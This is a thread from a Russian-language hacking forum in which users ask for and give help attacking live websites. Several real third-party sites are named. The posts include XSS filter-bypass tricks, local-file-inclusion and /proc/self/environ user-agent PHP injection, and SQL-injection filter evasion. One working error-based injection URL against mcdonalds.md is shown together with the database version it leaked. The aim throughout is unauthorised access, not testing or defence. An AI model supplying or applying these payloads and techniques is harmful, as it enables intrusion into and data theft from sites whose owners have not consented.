Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. _Spamer_

    _Spamer_ Elder - Старейшина

    Joined:
    3 Feb 2009
    Messages:
    89
    Likes Received:
    140
    Reputations:
    16
    Ребят есть активная XSS. Имеется фильтр на слово script.
    Нужно подгрузить свой js файл. Нужна альтернатива <script src=>
     
    1 person likes this.
  2. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    608
    Reputations:
    1,101
    Можнно использовать в каком-либо теге:
    Code:
    onload='eva("\x01\x02\x03")'
    И вставлять либо с помощью getElementById или любым удобным способом.
     
    #21682 randman, 31 Dec 2012
    Last edited: 31 Dec 2012
  3. SergioBlog

    SergioBlog New Member

    Joined:
    21 Jan 2011
    Messages:
    14
    Likes Received:
    2
    Reputations:
    0
    Помогите получить чтение файлов через этот скрипт. Ковычки экранируются.
    index.php?id=15&pr=d'

    Код самого скрипта:
    PHP:
    <?php      // if url then do info page
        
    if (isset($_GET['url'])) {
            include_once(
    "includes/info.inc.php");
        } else {
            
    // else do profiles alphabet
            
    if(isset($_GET['pr'])){
                
    $letter $_GET['pr'];
                if(
    $letter == "all"){
                    include_once(
    "includes/profiles/all.html");
                }
                else{
                    
    $thefile "includes/profiles/$letter.html";
                    
    $fp fopen($thefile,"r");
                    if(
    filesize($thefile) > 200){
                        
    $data fread($fpfilesize($thefile));
                        echo 
    "$data";        
                    }
                    else{
                        echo 
    "There are no users starting with $letter.";
                    }
                    
    fclose($fp);
                }
            } else {
                include_once(
    "includes/profiles/page.html"); 
            }
        }
    ?>
    Я нашел чтение файлов через другой скриптец, но там криво читает некоторые файлы(начинает не с начала). Код вот этого удалось получить нормально, надеюсь через него получить полноценное чтение.
     
  4. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,037
    Likes Received:
    531
    Reputations:
    935
    Откидывай расширение и вперед.
     
    _________________________
  5. mironich

    mironich Elder - Старейшина

    Joined:
    27 Feb 2011
    Messages:
    736
    Likes Received:
    73
    Reputations:
    19
    Данные в php скрипте фильтруюца такой рег-кой,
    PHP:
    /(\W|\_)/
    , можно ли обойти как-то(необходимо кавычку всунуть) или как-то выйти за кавчку в sql запросе.
    С наступающим!
     
  6. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    291
    Likes Received:
    55
    Reputations:
    20
    Всем привет! http://www.mobile-review.com/cgi-bin/presents2012.pl?"&option=redirect реально раскрутить sqli?
     
  7. cipa21

    cipa21 Elder - Старейшина

    Joined:
    9 Apr 2009
    Messages:
    548
    Likes Received:
    146
    Reputations:
    30
    Добрый день! Помогите со скулей.
    union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17
    ни в какую не хочет пропускать круглые скобочки. Возвращает просто пустую страницу.
    Работает с @@version, кстати вернуло 5.0.51a-24+lenny2+spu1 (Web Server: Apache/2.2.9 (Debian))
     
  8. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    948
    Likes Received:
    313
    Reputations:
    52
    cipa21, unhex(hex(version()))
     
  9. cipa21

    cipa21 Elder - Старейшина

    Joined:
    9 Apr 2009
    Messages:
    548
    Likes Received:
    146
    Reputations:
    30
    видимо я не так выразился.... в адресную строку вообще НИКАК нельзя писать скобочки, возвращает пустую страницу

    не пропускает именно вместе скобки открывающуюся с закрывающейся, по отдельности работает но только толку от этого ноль
     
    #21689 cipa21, 31 Dec 2012
    Last edited: 31 Dec 2012
  10. SergioBlog

    SergioBlog New Member

    Joined:
    21 Jan 2011
    Messages:
    14
    Likes Received:
    2
    Reputations:
    0
    Я провтыкал, там и ковычки и null-byte экранируется. Есть еще варианты?
     
  11. Pirotexnik

    Pirotexnik Banned

    Joined:
    13 Oct 2010
    Messages:
    365
    Likes Received:
    68
    Reputations:
    38
    -full url encode?
    -использование "@@"

    А в боевых условиях (достать хеш) зачем вам скобочки?
     
  12. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Помогите подобрать количество полей в:
    Code:
    http://mcdonalds.md/products/getallcategory?ascendent=1&category=1|2|3|4&idB=0&order=-1'
     
  13. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Только через Error-Based:

    Code:
    http://mcdonalds.md/products/getallcategory?ascendent=1&category=1|2|3|4&idB=0&order=1 and updatexml(0x3a,concat(0x3a,[COLOR=Red]version()[/COLOR]),0x3a)#
    XPATH syntax error: ':5.1.61'
     
    1 person likes this.
  14. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    А где можно найти подробную инфу по Error-Based и как узнать что нужно использовать данный метод?

    П.С. Спасибо за быстрый ответ на прошлый вопрос.
     
  15. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,417
    Likes Received:
    815
    Reputations:
    848
    Для общего понимания:
    https://forum.antichat.ru/showpost.php?p=407227&postcount=3
    для Болие детального понимания нужна понимать суть синтаксиса Mysql, т.е как правельно делоть запросы к бд и понимать как получается вывод...
     
    _________________________
  16. Artrix

    Artrix New Member

    Joined:
    13 Dec 2012
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    День добрый. Если есть доступ к proc/self/environ%00 с вывобом user-agent возможно посмотреть phpinfo заменой агента на <?php phpinfo();?>? Или не должно выводить?
     
  17. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Если у Вас LFI, а не просто чтение, то конечно да!
     
  18. Artrix

    Artrix New Member

    Joined:
    13 Dec 2012
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Да, LFI, но почему-то не выводит. В чем может быть проблема?
     
  19. herfleisch

    herfleisch Elder - Старейшина

    Joined:
    7 Jan 2009
    Messages:
    577
    Likes Received:
    174
    Reputations:
    13
    Нашел LFI:
    passwd отлично смотрится, но в ответ на
    возвращается пустая страница.

    Значит нет прав и нет смысла пытаться подменить user-agent?
     
  20. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,037
    Likes Received:
    531
    Reputations:
    935
    лоооооооооооооооооооооооооооооооол
     
    _________________________
Loading...
Thread Status:
Not open for further replies.